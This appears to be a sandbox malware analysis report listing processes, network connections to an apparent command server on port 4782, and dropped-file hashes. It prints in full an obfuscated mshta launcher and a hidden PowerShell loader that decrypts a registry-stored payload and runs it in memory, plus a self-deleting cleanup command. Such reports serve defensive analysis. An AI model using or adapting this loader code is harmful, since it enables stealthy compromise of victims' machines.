C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
C:\Windows\$sxr-cmd.exe
"C:\Windows\$sxr-cmd.exe" /c %$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\$sxr-powershell.exe
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{3ec00975-2522-4e40-adf0-4435a70b2e38}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{022663ae-862b-4f38-a00d-dbb525a00dd4}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{d504caaa-c79c-453c-b1bc-18ebb1c7ea53}
C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1452).WaitForExit();[System.Threading.Thread]::Sleep(5000); function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{38ad70bf-959b-489e-ae2d-e25d46f9883e}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{ec756ae8-5314-4cca-9af8-edd1eb90eafe}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{384b7751-ac97-498f-b52f-ad379fcc381b}
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{86b6c022-1e9c-4c44-833a-580a6c38975b}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{28aee83c-e9e1-4138-9f04-c7b6086bb192}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{76204e13-a5bc-44b3-bc60-508b516c4779}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{70f4f242-a443-4a22-a078-f94ca82ec1ed}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{b3372018-fd1f-4b9c-998d-97b33aa5acbb}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{11b3a8ff-bc30-4d0b-a3a8-6f8035d59d47}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{339bbc9e-4285-411e-96ac-20fb030e4855}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{e773df86-6fe6-4810-b7f8-c2aa615e2636}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{3f218a6a-9b04-4d80-9875-a8c7a6f6521e}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{420c71f7-7ee7-4613-a4cc-a63ec0aacd4a}
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{b5360dd6-5335-4280-946c-fa392e87983c}
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4332 -ip 4332
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 452
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{8a085641-610b-427f-9256-018d026f60bd}
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6980 -ip 6980
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6980 -s 460
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{09a3e476-c522-411b-96b1-45e811dc9e90}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 632 -p 6212 -ip 6212
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{6b4b94ba-5618-4a54-88ca-c5c3af5cc13f}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6212 -s 308
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
PING localhost -n 8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.201.86.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| FR | 163.5.215.216:4782 | tcp | |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| FR | 163.5.215.216:4782 | tcp |
Files
memory/2724-0-0x00007FFEF8593000-0x00007FFEF8595000-memory.dmp
memory/2724-1-0x000002090B680000-0x000002090B83E000-memory.dmp
memory/2724-2-0x00007FFEF8590000-0x00007FFEF9051000-memory.dmp
memory/2724-3-0x0000020926F00000-0x0000020926FE0000-memory.dmp
memory/2724-4-0x0000020927190000-0x0000020927336000-memory.dmp
memory/2724-5-0x00007FFEF8590000-0x00007FFEF9051000-memory.dmp
memory/2724-6-0x00007FFEF8590000-0x00007FFEF9051000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vcp0kky2.5ou.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2096-16-0x00007FFEF8590000-0x00007FFEF9051000-memory.dmp
memory/2096-17-0x00007FFEF8590000-0x00007FFEF9051000-memory.dmp
memory/2096-18-0x00000212FD790000-0x00000212FD7B2000-memory.dmp
memory/2096-19-0x00007FFEF8590000-0x00007FFEF9051000-memory.dmp
memory/2724-20-0x00007FFEF8593000-0x00007FFEF8595000-memory.dmp
memory/2724-21-0x00007FFEF8590000-0x00007FFEF9051000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
memory/2096-35-0x00007FFEF8590000-0x00007FFEF9051000-memory.dmp
memory/2248-36-0x00000263B24E0000-0x00000263B2504000-memory.dmp
memory/2248-38-0x00007FFF16290000-0x00007FFF1634E000-memory.dmp
memory/2248-37-0x00007FFF167F0000-0x00007FFF169E5000-memory.dmp
memory/2248-39-0x00000263CB7A0000-0x00000263CC1F0000-memory.dmp
memory/2248-41-0x00000263CC1F0000-0x00000263CC296000-memory.dmp
memory/2248-42-0x00000263CB4F0000-0x00000263CB546000-memory.dmp
memory/2248-43-0x00000263CC2A0000-0x00000263CC2F8000-memory.dmp
memory/2248-44-0x00000263B2510000-0x00000263B2532000-memory.dmp
memory/2248-45-0x00007FFF167F0000-0x00007FFF169E5000-memory.dmp
memory/2248-47-0x00000263CB150000-0x00000263CB15A000-memory.dmp
memory/3512-48-0x0000000140000000-0x0000000140004000-memory.dmp
memory/4516-50-0x0000000000400000-0x0000000000406000-memory.dmp
memory/3512-49-0x0000000140000000-0x0000000140004000-memory.dmp
memory/4516-51-0x0000000000400000-0x0000000000406000-memory.dmp
C:\Windows\$sxr-mshta.exe
| MD5 | 0b4340ed812dc82ce636c00fa5c9bef2 |
| SHA1 | 51c97ebe601ef079b16bcd87af827b0be5283d96 |
| SHA256 | dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895 |
